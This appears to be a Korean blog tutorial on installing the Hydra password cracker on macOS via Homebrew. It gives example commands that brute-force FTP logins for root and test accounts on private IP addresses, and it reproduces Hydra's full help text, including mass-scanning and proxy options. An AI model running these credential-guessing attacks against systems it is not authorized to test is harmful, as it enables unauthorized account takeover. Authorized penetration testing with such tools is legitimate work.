hydra(FTP Crack) - MacOS hydra 설치

Install the App(Homebrew)

1. 터미널 실행

 - Press Command+Space and type Terminal and press Enter/return key.

2. 터미널에 다음 명령어 실행

 - /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" 

 - Homebrew가 설치 될 동안 기다려야함, 만약 패스워드를 입력하라고 하는경우 사용자 패스워드를 입력하면됨

  * sudo로 실행하면 안됨

3. 터미널에 다음 명령어 실행

  - echo 'eval "$(/opt/homebrew/bin/brew shellenv)"' >> ~/.zprofile

4. 터미널 종료 후 재시작 필요

 

Install hydra on Mac OSX

1. 터미널에 다음 명령어 실행

  - brew install hydra 

2. You can now use hydra

 

hydra로 FTP 크랙

 

ex)

hydra -t 64 -V -f -l root -P direction-changes.txt ftp://192.168.0.3:3000

hydra -V -f -l test -x 5:5:a1 ftp://192.168.0.6:3000

 

hydra manual

hydra -h Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]] Options:   -R        restore a previous aborted/crashed session   -I        ignore an existing restore file (don't wait 10 seconds)   -S        perform an SSL connect   -s PORT   if the service is on a different default port, define it here   -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE   -p PASS  or -P FILE  try password PASS, or load several passwords from FILE   -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help   -y        disable use of symbols in bruteforce, see above   -r        use a non-random shuffling method for option -x   -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login   -u        loop around users, not passwords (effective! implied with -x)   -C FILE   colon separated "login:pass" format, instead of -L/-P options   -M FILE   list of servers to attack, one entry per line, ':' to specify port   -o FILE   write found login/password pairs to FILE instead of stdout   -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1   -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)   -t TASKS  run TASKS number of connects in parallel per target (default: 16)   -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)   -w / -W TIME  wait time for a response (32) / between connects per thread (0)   -c TIME   wait time per login attempt over all threads (enforces -t 1)   -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)   -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode    -O        use old SSL v2 and v3   -K        do not redo failed attempts (good for -M mass scanning)   -q        do not print messages about connection errors   -U        service module usage details   -m OPT    options specific for a module, see -U output for information   -h        more command line options (COMPLETE HELP)   server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)   service   the service to crack (see below for supported protocols)   OPT       some service modules support additional input (-U for module help) Supported services: adam6500 asterisk cisco cisco-enable cobaltstrike cvs ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak telnet[s] vmauthd vnc xmpp Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL v3.0. The newest version is always available at; https://github.com/vanhauser-thc/thc-hydra Please don't use in military or secret service organizations, or for illegal purposes. (This is a wish and non-binding - most such people do not care about laws and ethics anyway - and tell themselves they are one of the good ones.) These services were not compiled in: afp firebird memcached mongodb ncp oracle postgres radmin2 rdp sapr3 svn smb2. Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup. E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)      % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)      % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080      % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries) Examples:   hydra -l user -P passlist.txt ftp://192.168.0.1   hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN   hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5   hydra -l admin -p password ftp://[192.168.0.0/24]/   hydra -L logins.txt -P pws.txt -M targets.txt ssh

 

hydra -x(password bruteforce generation) manual

hydra -x -h Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra bruteforce password generation option usage:   -x MIN:MAX:CHARSET      MIN     is the minimum number of characters in the password      MAX     is the maximum number of characters in the password      CHARSET is a specification of the characters to use in the generation              valid CHARSET values are: 'a' for lowercase letters,              'A' for uppercase letters, '1' for numbers, and for all others,              just add their real representation.   -y         disable the use of the above letters as placeholders Examples:    -x 3:5:a  generate passwords from length 3 to 5 with all lowercase letters    -x 5:8:A1 generate passwords from length 5 to 8 with uppercase and numbers    -x 1:3:/  generate passwords from length 1 to 3 containing only slashes    -x 5:5:/%,.-  generate passwords with length 5 which consists only of /%,.-    -x 3:5:aA1 -y generate passwords from length 3 to 5 with a, A and 1 only The bruteforce mode was made by Jan Dlabal, http://houbysoft.com/bfg/